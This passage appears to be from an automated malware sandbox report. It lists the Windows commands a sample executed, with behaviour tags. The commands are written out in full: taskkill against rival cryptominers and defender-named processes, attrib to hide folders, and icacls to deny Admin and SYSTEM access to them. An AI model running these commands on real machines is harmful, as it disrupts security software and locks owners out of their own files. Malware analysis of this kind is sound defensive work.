- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM coretempapp.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\coretempapp"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\coretempapp" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM kryptex.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM kryptex7.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\roaming\kryptex"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\kryptex" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM generictools.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM digitalsearch.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\appdata\local\generictools"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\local\generictools" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\steam"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\steam" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM esif.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\esif.exe" /deny Admin:(D,F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM muxu.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM muxu.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM CEF.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM CEF.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Cefunpacked\ /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\temp\System324⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\temp\Windowstask4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\temp\Windowstask /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\temp\System32 /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\temp\System32\Logs4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\temp\Windowstask4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\temp4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\temp\Windowstask /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\temp\System32\Logs /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windefender.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel1.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nvidiahelp.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM taskhost.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nvidiadriver.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\AppData\roaming\system"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\system" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\MicrosoftCorporation"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\MicrosoftCorporation" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel1.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM taskhost.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\appdata\roaming\WindowsApps4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\WindowsApps" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM systemcore.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\appdata\roaming\windowshelper4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\windowshelper" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM defender.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM winmgmnt.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "D:\Windowsdata"4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Windowsdata"4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "E:\Windowsdata"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "K:\Windowsdata"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "D:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "E:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "K:\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM webservice.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM securedisk.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\disk4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\disk" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM systemprocess.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\appdata\roaming\systemprocess4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\systemprocess" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM defender.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\AppData\roaming\microsoft\windows defender" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM debugger.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\appdata\roaming\microsoft\network"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\network" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM gplyra.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\users\Admin\appdata\roaming\gplyra"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\gplyra" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM run.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\tiser"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\tiser" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nettrans.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\programdata\prefssecure"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\prefssecure" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM net.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM net1.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM SYSTEM.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\windowshelper" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\intel" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\app" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nscpucnminer.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\windows\min"4⤵
- Drops file in Windows directory
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\min\ /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ErrorCheck.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Mikile /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM booster.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM unityp.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM booster.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hoststore.exe /T /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdeffenders.exe /T /F4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\windows\hs_moduler4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\hs_module" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM dvjyy.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostsys.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\programdata\oracle4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\oracle" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM booster.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\PCBooster4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nheqminer.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msminer.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM winlog.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\systemcare4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Windows System Driver.exe" /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Windows Driver.exe" /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "COM Surrogate.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "system.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "security.exe" /T /F4⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL /deny system:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Framework /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Framework /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AMD.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\AMD /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\AMD /deny system:(OI)(CI)(F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nssm.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmarin.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wupdate.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\wupdate4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM SIVapp.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\SIVapp4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM Kyubey.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\kyubey4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM mel.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\QIPapp4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\QIPapp /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM NSCPUCNMINER64.EXE /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM img002.EXE /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\NSCPUCNMINER4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM monotype.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\local\monotype4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\monotype /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xpon.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\local\xpon4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\xpon /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\xpon /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmrig.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Roaming\isminer4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM security.exe /T /F4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM comdev.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\comdev4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wmipr.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\users\Admin\AppData\Local\wmipr4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM defender.exe /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM winmgmnt.exe /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hostdl.exe /F4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windowsdata4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Windowsdata" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM dlhosta.exe /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\performance" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appdata\roaming\microsoft\windows\system" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\AudioHDriver"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\AudioHDriver" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\AudioDriver"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\AudioDriver" /deny Admin:(OI)(CI)(F)4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM vshub.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM vsnhub.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM erenhub.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioHD.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioDriver.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM penapen.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\AudioHDriver"4⤵
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\Programdata\AudioDriver"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\users\Admin\AppData\Roaming\Sysfiles"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AudioDriver" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appData\Roaming\Sysfiles" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\users\Admin\appData\Roaming\AudioHDriver" /deny Admin:(OI)(CI)(F)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdriver.exe /T /F4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM windowsdriver.exe /T /F4⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S +R "C:\programdata\Windowsdriver"4⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\programdata\Windowsdriver" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
